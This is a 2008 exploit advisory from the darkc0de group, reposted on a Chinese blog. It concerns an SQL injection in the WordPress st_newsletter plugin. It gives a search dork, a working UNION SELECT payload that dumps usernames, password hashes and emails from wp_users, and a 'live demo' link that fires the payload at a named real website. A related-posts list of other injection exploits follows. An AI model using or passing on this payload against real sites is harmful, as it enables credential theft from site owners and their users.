################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz #
# and all darkc0de and DarkTrix members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com & darktrix.info
#
# Email : r45c4l@hotmail.com
#
# Share the c0de!
#
################################################################
#
# Title: WordPress stnl_iframe remote sql injection vulnerability
#
#
###########################################################
#
# d0rk: ''stnl_iframe''
#
###########################################################
POC :-
wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
Live Demo:
http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
###########################################################
#
# Bug discovered : 18 Oct 2008
###########################################################
# milw0rm.com [2008-10-17]
分享本身就是件快乐的事 我因别人得到帮助而感到幸福
Wordpress Plugin st_newsletter (stnl_iframe.php) SQL Injection Vuln
2008年10月18日 11:14:51 发布:Trace
Tags: Wordpress sql injection Vulnerability
固定链接 | 分类:Web apps | 评论:0 | 引用:0 | 浏览:
- 相关文章:
犀利的 oracle 注入技术 (2008-10-17 17:27:56)
load_file()查看常用的一些配置文件 (2008-10-17 15:44:54)
PHP SQL Injection 和 XSS 的偵測程式 和 程式撰寫注意事項 - 2008 (2008-10-15 19:57:55)
WP Comment Remix 1.4.3 Remote SQL Injection Exploit (2008-10-14 22:21:18)
From SQL Injection to Remote Desktop (2008-10-13 14:46:14)
Apache Tomcat WebDav Remote Information Disclosure Vulnerability (2008-10-10 11:1:32)
PHP二分法注射猜解 (2008-10-6 19:7:33)
Sql Injection Challenge How-to (2008-10-6 4:47:3)
Assault on Oracle PL/SQL - Injection (2008-10-5 13:5:24)
Serv-U 7.2.0.1 Remote FTP File Replacement Vulnerability (auth) (2008-10-3 23:29:42)
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
